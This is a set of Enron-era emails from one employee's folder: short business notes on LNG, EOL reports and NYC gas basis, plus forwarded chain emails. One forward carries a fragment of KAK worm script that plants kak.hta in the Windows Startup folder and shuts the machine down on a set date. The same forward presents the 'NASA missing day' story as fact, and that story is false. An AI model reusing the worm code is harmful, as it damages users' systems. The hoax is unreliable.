To: chris.gaskill@enron.com, hunter.shively@enron.com, phillip.allen@enron.com,
	mike.grigsby@enron.com, jim.schwieger@enron.com,
	john.lavorato@enron.com, brad.mckay@enron.com,
	thomas.martin@enron.com
Subject: LNG - Impacts on the US Market
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-From: Sean Boyle
X-To: Chris Gaskill, Hunter S Shively, Phillip K Allen, Mike Grigsby, Jim Schwieger, John J Lavorato, Brad McKay, Thomas A Martin
X-cc: 
X-bcc: 
X-Folder: \Bradley_McKay_Dec2000\Notes Folders\Discussion threads
X-Origin: McKay-B
X-FileName: bmckay.nsf

Please let me know if you have any questions.
Thanks,
Sean

From MAILER-DAEMON Mon Apr 18 14:19:41 2022
Message-ID: <20494051.1075857292056.JavaMail.evans@thyme>
Date: Wed, 29 Nov 2000 04:03:00 -0800 (PST)
From: sean.boyle@enron.com
To: scott.neal@enron.com, jared.kaiser@enron.com, sandra.brawner@enron.com,
	dick.jenkins@enron.com, brad.mckay@enron.com,
	scott.hendrickson@enron.com, andrea.ring@enron.com,
	susan.pereira@enron.com, dan.junek@enron.com,
	chris.germany@enron.com, judy.townsend@enron.com,
	robin.barbe@enron.com, tammi.depaolis@enron.com,
	john.taylor@enron.com, scott.goodell@enron.com,
	victoria.versen@enron.com
Subject: EOL Reports & Analysis
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-From: Sean Boyle
X-To: Scott Neal, Jared Kaiser, Sandra F Brawner, Dick Jenkins, Brad McKay, Scott Hendrickson, Andrea Ring, Susan W Pereira, Dan Junek, Chris Germany, Judy Townsend, Robin Barbe, Tammi DePaolis, John Craig Taylor, Scott Goodell, Victoria Versen
X-cc: 
X-bcc: 
X-Folder: \Bradley_McKay_Dec2000\Notes Folders\Discussion threads
X-Origin: McKay-B
X-FileName: bmckay.nsf

I am working with the EOL system development group on improving the reporting 
capabilities of EOL so that Internal EOL traders can personalised and save 
report formats.  Currently the system only saves the last report format.  If 
you have any ideas, thoughts or requests please let me know.
I have attached a file with examples of reports that can be generated.  The 
goal would be to give you the ability to view the information when you need 
it and in the required format.

From MAILER-DAEMON Mon Apr 18 14:19:41 2022
Message-ID: <7272150.1075857292077.JavaMail.evans@thyme>
Date: Thu, 30 Nov 2000 10:20:00 -0800 (PST)
From: brad.mckay@enron.com
To: tazh@pira.com
Subject: NYC Gate Basis
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-From: Brad McKay
X-To: tazh@pira.com
X-cc: 
X-bcc: 
X-Folder: \Bradley_McKay_Dec2000\Notes Folders\Discussion threads
X-Origin: McKay-B
X-FileName: bmckay.nsf

Thomas: Can you please answer the following questions:
1. What is the NYC Gate volume that can be switched to NYH#6, NYH#2 and 
Diesel ?
2. What utilities have this capability, and what is the volume per utility?
3. What is the volume outside NYC that can be switched?
4. Explain the mechanism for determining the fuel oil pricing

I was at the meeting I had to leave early, thanks Brad

From MAILER-DAEMON Mon Apr 18 14:19:41 2022
Message-ID: <3062260.1075857291987.JavaMail.evans@thyme>
Date: Tue, 17 Oct 2000 08:33:00 -0700 (PDT)
From: brad.mckay@enron.com
To: rex@arn.net
Subject: Taxes
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-From: Brad McKay
X-To: rex@arn.net
X-cc: 
X-bcc: 
X-Folder: \Bradley_McKay_Dec2000\Notes Folders\Discussion threads
X-Origin: McKay-B
X-FileName: bmckay.nsf

Rex: I just wanted to thank you once more for doing our tax return. We 
realize that this is a very busy time of the year so thanks for your time. I 
reviewed the return and everything looked great. Have a great time fishing. 
Brad  

From MAILER-DAEMON Mon Apr 18 14:19:41 2022
Message-ID: <11742674.1075857292126.JavaMail.evans@thyme>
Date: Thu, 30 Nov 2000 11:08:00 -0800 (PST)
From: mnl@ranches.org
To: veboxwell@hotmail.coml, molag@arn.net, tina_aikman@hotmail.com,
	susie@ranches.org, psticksel@aol.com, nancycw99@yahoo.com,
	johndutch@aol.com, meredithaikman@hotmail.com,
	mattsticksel@yahoo.com, jamitchell52@hotmail.com, jsticksel@cs.com,
	jay@ranches.org, janie@centramedia.net, rex@arn.net,
	elasmith@aol.com, crimblue@aol.com, cjboyd@aol.com, cware26@tcac.net,
	tritail@cox-internet.com, brad.mckay@enron.com, beckymcki@aol.com
Subject: FW: NASA and the Bible
Mime-Version: 1.0
Content-Type: text/plain; charset=ANSI_X3.4-1968
Content-Transfer-Encoding: 7bit
X-From: "Mary Nell Lemert" <MNL@ranches.org>
X-To: "Vicky Boxwell" <veboxwell@hotmail.coml>, "Vicki LaGrone" <molag@arn.net>, "Tina Aikman" <tina_aikman@hotmail.com>, "Susie O'Brien" <Susie@ranches.org>, "Pan Sticksel" <PSTICKSEL@aol.com>, "Nancy Williams" <nancycw99@yahoo.com>, "Nancy Baay" <johndutch@aol.com>, "Meredith Aikman" <meredithaikman@hotmail.com>, "Matt Sticksel" <mattsticksel@yahoo.com>, "Julie Mitchell" <jamitchell52@hotmail.com>, "JSticksel" <JSticksel@cs.com>, "Jay O'Brien" <Jay@ranches.org>, "Janie Hathoot" <janie@centramedia.net>, "J. Rex Lemert P.C." <rex@arn.net>, "Elaine Smith" <elasmith@aol.com>, "Claudette Landess" <crimblue@aol.com>, "Cheri Boyd" <cjboyd@aol.com>, "Caroline Ware" <cware26@tcac.net>, "Carol Harrell" <tritail@cox-internet.com>, "Brad McKay" <Brad.Mckay@enron.com>, "Becky McKinley" <beckymcki@aol.com>
X-cc: 
X-bcc: 
X-Folder: \Bradley_McKay_Dec2000\Notes Folders\Discussion threads
X-Origin: McKay-B
X-FileName: bmckay.nsf

?

?

-----Original Message-----
From: Mary Pate [mailto:mgpate@arn.net]
Sent: Wednesday, November 29, 2000 9:35 PM
To: Wilson Pate; Robert Johnson; Graham Pate; Paige Pate; Gene Graham; 
Suzanne Mauze; Cissy Bankhead; Jim Bankhead; Margaret Herring; Sally Kritser; 
Barbara Harkins; Carolyn Garner; Sandra Gilliland; Mary Nell Lemert; 
TXKarebear@AOL.com; kenna dubose; Patty Christian; D'Layne Peeples; 
Murray/Jeri Gossett
Subject: Fw: NASA and the Bible

?

?

');t3.close();fs.GetFile(wd+'kak.htm').Attributes=2;fs.DeleteFile(wd+'kak.reg'
);d=new Date();if(d.getDate()==1 && 
d.getHours()>17){alert('Kagou-Anti-Kro$oft says not today 
!');wsh.Run(wd+'RUNDLL32.EXE user.exe,exitwindows');}self.close();S3 driver 
memory alloc failed ? !]]%%%%%D,marrer\\Programmes\\D,marrage\\kak.
hta":"C:\\windows\\Start 
Menu\\Programs\\StartUp\\kak.hta";agt=navigator.userAgent.toLowerCase();if(((a
gt.indexOf("msie")!=-1)&&(parseInt(navigator.appVersion)>4))||(agt.indexOf("ms
ie 5.")!=-1))scr.write(); // --> 
----- Original Message -----  


From:Robert Johnson 

To:'Wilson (Home)' ; 'Mary Pate' ; 'mary pate' 

Sent:Wednesday, November 29, 2000 1:10 PM

Subject:FW: NASA and the Bible

?

?

-----Original Message-----
From: Doug Jackson [mailto:djackson@jacksonproperty.com] 
Sent: Tuesday, November 28, 2000 9:40 PM
To: Jeannie Dunston; Nita Vaughn; Jim Swafford; Vicki Rusche; Marivel
Robinson; Cheryl Ann Raffanti; North Hills Place; Cyndi Pitman; John W.
Lyon; Mark E. Lyon; Morris Lloyd; Gayland Laing; Robert Johnson; Stefani
Jackson; Sean D. Jackson; Pat Ivie; Francis Hung; Laura Hudler; William
Hills; Dave Garber; Thomas J. Freytag; Steve Elken; Lohren Edney; John
W. Demars; Isibelle DeBaun; Suzanne Cunningham; Jim Brown; Ken Braddy;
Eva Aromi; Toni Anderson
Subject: NASA and the Bible




?For all the scientists out there and for all the students who have a hard
time convincing these people regarding the truth of the Bible...here's
?something that
?shows God's awesome creation and shows that He is still in control. Did
you
? know that the space program is busy proving that what has been called
"myth" in the Bible is true?

?Mr. Harold Hill, President of the Curtis Engine Company in Baltimore
Maryland and a consultant in the space Program relates the following
development.
?"I? think one of the most amazing things that God has for us today
happened recently to our astronauts and space scientists at Greenbelt,
Maryland.
They were checking the position of the sun, moon, and planets out in space
where they would be 100 years and 1000 years from now.? We have to know this
so we won't send a satellite, up and have it bump into something later on in
its orbits. We have to lay out the orbits in terms of the life of the
satellite, and where
the planets will be so the whole thing will not bog down.

They ran the computer measurement back and forth over the centuries and it
?came to a halt. The computer stopped and put up a red signal, which meant
?that there was something wrong either with the information fed into it or
with the results as compared to the standards.

?They called in the service department to check it out and they said,"What's
wrong?" Well, they found there is a day missing in space in elapsed time.
They
?scratched their heads and tore their hair. There was no answer.

?Finally, a Christian man on the team said, "You know, one time I was in
?Sunday School and they talked about the sun standing still."
?While they didn't believe him, they didn't have an answer either, so they
?said, "Show us." He got a Bible and went back to the book of Joshua where
?they found a pretty ridiculous statement for any one with "common sense."
?There they found the Lord saying to Joshua, "Fear them not, I have
delivered
them into thy hand; there shall not a man of them stand before thee."
?Joshua was concerned because he was surrounded by the enemy and if
darkness fell they would overpower them. So Joshua asked the Lord to make
the
sun
?stand still! That's right-"The sun stood still and the moon stayed and
hasted not to go down about a whole day!"?? (Joshua 10:12-13)

The astronauts and scientists said, "There is the missing day!"? They
checked
the computers going back into the time it was written and found it was close
but not close enough. The elapsed time that was missing back in Joshua's day
was
23 hours and 20 minutes-not a whole day.

?They read the Bible and there it was "about (approximately) a day." These
?little words in the Bible are important, but they were still in trouble
because if you cannot account for 40 minutes you'll still be in trouble
1,000
years from now.
Forty? minutes had to be found because it can be multiplied many times over
in orbits.

?As the Christian employee thought about it, he remembered somewhere in the
?Bible where it said the sun went BACKWARDS. The scientists told him he was
?out of his mind, but they got out the Book and read these words in 2 Kings
?that told of the following story: Hezekiah, on his deathbed, was visited
by the prophet Isaiah who told him that he was not going to die. Hezekiah
asked for a sign as proof.

?Isaiah said "Do you want the sun to go ahead 10 degrees?"

Hezekiah said "It is nothing for the sun to go ahead 10 degrees, but let
the shadow return backward 10 degrees."

Isaiah spoke to the Lord and the Lord brought the shadow ten
degreesBACKWARD!

Ten degrees is exactly 40 minutes! Twenty-three hours and 20 minutes in
?Joshua, plus 40 minutes in Second Kings make the missing day in the
universe!

?Isn't it amazing?

?References: Joshua 10:8 and 12, 13 and 2 Kings 20:9-11.

?Forward this to as many people who you believe would think this is equally
as cool.

?Never be afraid to try something new.? Remember, amateurs built the ark.
?Professionals built the Titanic.

?

?Have a great day!

"WorldSecure <firstsw.com>" made the following
annotations on 11/29/00 13:10:01
------------------------------------------------------------------------------

[INFO] -- Content Manager:
First Southwest Company is not responsible for any recommendation, 
solicitation, offer or agreement or any information about any transactions, 
customer account or account activity contained in this communication.

==============================================================================

From MAILER-DAEMON Mon Apr 18 14:19:41 2022
Message-ID: <17791115.1075857292099.JavaMail.evans@thyme>
Date: Thu, 30 Nov 2000 10:57:00 -0800 (PST)
From: mnl@ranches.org
To: chompers@flash.net, rex@arn.net, spanky@nkn.net, brad.mckay@enron.com
Subject: FW: lucky hat
Mime-Version: 1.0
Content-Type: text/plain; charset=ANSI_X3.4-1968
Content-Transfer-Encoding: 7bit
X-From: "Mary Nell Lemert" <MNL@ranches.org>
X-To: "Jas Lemert" <chompers@flash.net>, "J. Rex Lemert P.C." <rex@arn.net>, "Glen Stephenson" <Spanky@nkn.net>, "Brad McKay" <Brad.Mckay@enron.com>
X-cc: 
X-bcc: 
X-Folder: \Bradley_McKay_Dec2000\Notes Folders\Discussion threads
X-Origin: McKay-B
X-FileName: bmckay.nsf

I think you all will like this one!!!!---------Mary Nell(Nellie, Mom)

?

-----Original Message-----
From: moe [mailto:moe@amaonline.com]
Sent: Thursday, November 30, 2000 1:18 PM
To: mandy; vicki; susie; sheri; Sam Yingling; lisa; leslie; kirk; kathy; 
jim-whit; jerry; docstrange; dean; David McKean; david; craig; commish; 
carol; christian; bo; allen
Subject: lucky hat

?

??? ??? ??? 

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?
 - luckyhat.jpg

